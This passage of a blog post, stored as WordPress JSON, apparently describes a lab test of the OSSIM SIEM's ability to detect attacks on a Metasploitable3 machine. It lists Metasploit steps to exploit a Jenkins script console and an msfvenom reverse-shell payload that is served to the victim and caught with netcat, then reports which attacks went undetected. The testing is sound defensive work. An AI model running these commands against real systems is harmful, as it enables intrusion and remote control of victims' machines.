807px\" \/><\/p>\n<p>This service is using port 8484, and the version of this Jenkins web app is 1.637.<\/p>\n<p>I enumerated details about this server using the auxiliary modules available in Metasploit.<\/p>\n<p><em>search type:auxiliary jenkins<\/em><\/p>\n<p><em>use auxiliary\/scanner\/http\/jenkins_command<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>The jenkins_command module will search for unauthenticated consoles which allow commands to be executed on it. In this case, the scanner will execute the command whoami.<\/p>\n<p>We the parameters as follows:-<\/p>\n<p><em>set RHOSTS 10.0.2.2<\/em><\/p>\n<p><em>set RPORT 8484<\/em><\/p>\n<p><em>set TARGETURI \/<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4382 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=804%2C387&#038;ssl=1\" alt=\"\" width=\"804\" height=\"387\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?w=804&amp;ssl=1 804w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=300%2C144&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=768%2C370&amp;ssl=1 768w\" sizes=\"auto, (max-width: 804px) 100vw, 804px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Then, I searched for Jenkins based exploits.<\/p>\n<p><em>search type:exploit jenkins<\/em><\/p>\n<p><em>use exploit\/multi\/http\/jenkins_script_console<\/em><\/p>\n<p><em>set RHOSTS 10.0.2.2<\/em><\/p>\n<p><em>set RPORT 8484<\/em><\/p>\n<p><em>set TARGETURI \/<\/em><\/p>\n<p>exploit<\/p>\n<p>Successfully got meterpreter shell:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4383 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=795%2C213&#038;ssl=1\" alt=\"\" width=\"795\" height=\"213\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?w=795&amp;ssl=1 795w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=300%2C80&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=768%2C206&amp;ssl=1 768w\" sizes=\"auto, (max-width: 795px) 100vw, 795px\" \/><\/p>\n<p>This attack was undetected by OSSIM as there were no alerts raised by HIDS or NIDS.<\/p>\n<h3><a name=\"_Toc80823577\"><\/a>Reverse Shell<\/h3>\n<p>&nbsp;<\/p>\n<p>We creation of malicious payload and hosting it via WebServer on attacker machine and executed the payload on victim machine:-<\/p>\n<p><strong>Create Malicious Payload<\/strong><\/p>\n<p>\/usr\/bin\/msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.2.15 LPORT=9999 -f exe -o payload.exe<\/p>\n<p><strong>Start WebServer<\/strong><\/p>\n<p>python -m SimpleHTTPServer 4000<\/p>\n<p>&nbsp;<\/p>\n<p>Trick the user on the victim machine to download and execute the malicious payload<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4384 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=834%2C702&#038;ssl=1\" alt=\"\" width=\"834\" height=\"702\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?w=834&amp;ssl=1 834w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=300%2C253&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=768%2C646&amp;ssl=1 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>We successfully got a reverse shell connection on Kali machine<\/p>\n<p>Command: nc -lnvp 9999<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4385 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=795%2C51&#038;ssl=1\" alt=\"\" width=\"795\" height=\"51\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?w=795&amp;ssl=1 795w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=300%2C19&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=768%2C49&amp;ssl=1 768w\" sizes=\"auto, (max-width: 795px) 100vw, 795px\" \/><\/p>\n<p>But there were no alerts on the OSSIM console for this, it was undetected by OSSIM.<\/p>\n<h2><a name=\"_Toc80823578\"><\/a>Dashboard after attacks<\/h2>\n<p>&nbsp;<\/p>\n<p>On the Analysis and Alarms, we can see our directives worked as expected and we captured the below alarms: &#8211;<\/p>\n<ol>\n<li>NMAP<\/li>\n<li>Brute-Force<\/li>\n<li>ShellShock Attack<\/li>\n<\/ol>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4386 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=828%2C858&#038;ssl=1\" alt=\"\" width=\"828\" height=\"858\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?w=828&amp;ssl=1 828w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=290%2C300&amp;ssl=1 290w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=768%2C796&amp;ssl=1 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2><a name=\"_Toc80823579\"><\/a>Reports<\/h2>\n<p>The OSSIM console provides very comprehensive reports on the below subjects: &#8211;<\/p>\n<ol>\n<li><strong>Alarm Report <\/strong><\/li>\n<\/ol>\n<ul>\n<li>Top 10 attacker host<\/li>\n<li>Top 10 Attacked Host<\/li>\n<li>Top 10 used ports<\/li>\n<li>Top 15 Alarms<\/li>\n<li>Top 15 Alarms by Risk<\/li>\n<\/ul>\n<p>There are more reports available on the topics below: &#8211;<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"2\">\n<li><strong>Business and Compliance ISO PCI Report <\/strong><\/li>\n<li><strong>SIEM Events <\/strong><\/li>\n<li><strong>Vulnerability Report <\/strong><\/li>\n<\/ol>\n<h1><a name=\"_Toc80823580\"><\/a>Results<\/h1>\n<p>We were able to successfully detect three out of five attacks conducted on the metasploitable3 machine which proves that OSSIM\u2019s correlation and anomaly detection models work as expected:<\/p>\n<ul>\n<li>Brute force \u2013 Detected Successfully<\/li>\n<li>Probe \u2013 Detected Successfully<\/li>\n<li>ShellShock (using Nikto) \u2013 Detected Successfully<\/li>\n<li>Exploiting Jenkins \u2013 Couldn\u2019t be detected<\/li>\n<li>Remote shell \u2013 Couldn\u2019t be detected<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>While not being able to detect such critical attacks is a matter of concern, but I am aware of the limitation of this POC setup to justify as why we were not able to capture them.<\/p>\n<p>For SIEM to corelate alerts, there are supposed to be alert at the first place, for the failed scenarios we couldn\u2019t see any alerts on the SIEM by the sensor sources that explains why there weren\u2019t caught.<\/p>\n<p>In an ideal environment we will have logs from more sources such as:-<\/p>\n<ul>\n<li>Firewall<\/li>\n<li>IPS \/ IDS<\/li>\n<li>Network Devices (NetFlow)<\/li>\n<li>WAF<\/li>\n<\/ul>\n<p>In that situation it will be easier to catch such attacks on SIEM. The more alerts ( relevant) the better correlation.<\/p>\n<p>&nbsp;<\/p>\n<h1><a name=\"_Toc80823581\"><\/a>Discussion<\/h1>\n<p>I had started with QRadar but switched to OSSIM due to the below issues:<\/p>\n<ul>\n<li>License Issue on the latest version, which is primarily an unfixed bug, and being supported on best effort basis<\/li>\n<li>When I managed to resolve the license issue, I couldn\u2019t collect any network flow logs despite of being able to see flows by performing tcpdump on QRadar<\/li>\n<\/ul>\n<p>While I was enticed to incorporate DDoS as one of the use cases, I notified that DDoS such as TCP Syn attack would render the OSSIM VM unusable to due to some bug or probably shortcoming in the infra of POC.<\/p>\n<p>The biggest challenge I faced during this POC setup and testing was primarily the instability of VMs, caused by memory issues. OSSIM had crashed multiple times with database error. The snapshot is below:<\/p>\n<p>The snapshot couldn\u2019t provide recovery as well, I ended up creating the image from scratch multiple times. If hardware constraints weren\u2019t there, the POC could have shown better and consistent results.<\/p>\n<p>The OSSIM tool has some fantastic features as live traffic capture via traffic capture module and a built-in traffic capture reader.<\/p>\n<p>&nbsp;<\/p>\n<h1><a name=\"_Toc80823583\"><\/a>References<\/h1>\n<p><a href=\"https:\/\/cybersecurity.att.com\/products\/ossim\">https:\/\/cybersecurity.att.com\/products\/ossim<\/a><\/p>\n<p><a href=\"https:\/\/cybersecurity.att.com\/documentation\/usm-appliance\/correlation\/tutorial-creating-new-directive.htm\">https:\/\/cybersecurity.att.com\/documentation\/usm-appliance\/correlation\/tutorial-creating-new-directive.htm<\/a><\/p>\n<p><a href=\"https:\/\/www.ossec.net\/\">https:\/\/www.ossec.net\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[53],"tags":[62,61,60,63,65,64],"class_list":["post-4359","post","type-post","status-publish","format-standard","hentry","category-cyber-security","tag-attack","tag-intrusion-detection","tag-network-anomaly-detection","tag-nids","tag-siem","tag-soc"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4359"}],"version-history":[{"count":7,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions"}],"predecessor-version":[{"id":4391,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions\/4391"}],"wp:attachment":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}